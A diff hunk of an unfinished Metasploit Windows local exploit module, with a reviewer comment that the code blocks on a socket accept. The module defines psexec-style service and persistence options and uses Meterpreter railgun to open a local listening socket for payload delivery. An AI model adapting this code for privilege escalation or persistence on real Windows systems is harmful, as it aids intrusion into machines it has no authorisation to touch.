modules/exploits/windows/local/one_day.rb

```diff
@@ -0,0 +1,314 @@
+        'Targets'        =>
+          [ # not fully implamented yet
+            [ 'PowerShell', { } ],
+            [ 'Native upload', { } ],
+            [ 'MOF upload', { } ]
+          ],
+        'DefaultTarget'  => 0
+      ))
+
+
+
+    # No importing psexec this way, which errors out with remove_socket
+    register_options([
+        OptAddress.new('RHOST', [true, "The target address on local system", "127.0.0.1"]),
+        OptPort.new('RPORT', [true, "Set the SMB service port", 445]),
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing", nil]),
+        OptString.new('SERVICE_DISPLAY_NAME', [false, "The service display name", nil]),
+        OptString.new('SERVICE_NAME', [false, "The service name", nil])
+        ], self.class)
+    register_advanced_options([
+        OptString.new('LocalHost', [false, "The server's internal IP address", "127.0.0.1"]),
+        OptPort.new('LocalPort', [false, "The server's internal port", 80]), # \\127.0.0.1@SSL@4444\abc.gif
+        OptBool.new('SERVICE_PERSIST', [false, "Create an Auto run service and do not remove it", false])
+        ], self.class)
+    # ReverseListenerComm will work!
+    deregister_options('SMBPass', 'SMBUser', 'SMBDomain') # This is already set
+  end
+
+# would be nice to be able to do this!
+=begin
+  def smb_psexec_simple(ser_sock)
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    # ser_sock.psexec(command)
+  end
+=end
+
+  # Its staying
+  def exploit()
+    setup_railgun()
+    sleep(1)
+  end
+
+  # Use win api to create a tcp server on the box
+  # This actually works really well, maybe consider adding this in future
+  def setup_railgun()
+    # Our new added function for railgun (send) will use rubys send.
+    client.railgun.add_function('ws2_32', 'sendit', 'DWORD',[
+      ["DWORD","s","in"],
+      ["PCHAR","buf","in"],
+      ["DWORD","len","in"],
+      ["DWORD","flags","in"],
+      ], windows_name='send')
+
+    handler = client.railgun.ws2_32.socket('AF_INET', 'SOCK_STREAM', 'IPPROTO_TCP')
+    sock = handler['return']
+
+    # Setup our socket format
+    # Incase you want to bind to something other than 127
+    sock_addr = "\x02\x00"
+    sock_addr << [datastore['LocalPort']].pack('n')
+    sock_addr << Rex::Socket.addr_aton(datastore['LocalHost'])
+    sock_addr << "\x00" * 8
+
+    # Bind, Listen, and then block till we accept.
+    r = client.railgun.ws2_32.bind(sock, sock_addr, 16)
+    print_status("Socket bind with ws2_32")
+    # Set the name here so we can kill it later!
+    # random_service = Rex::Text.rand_text_alpha((rand(8)+6))
+    begin
+      # proc_start(random_service)
+      # print_status("Process Started")
+      r = client.railgun.ws2_32.listen(sock, 10)
+      print_status("Socket is now listening on #{datastore['LocalHost']} we are waiting for a connect")
+      r = client.railgun.ws2_32.accept(sock, nil, nil)
```

Comment:
This needs to happen asynchronously as the module blocks here, and never actually gets to assign @n_sock or run railgun_recv_smb_do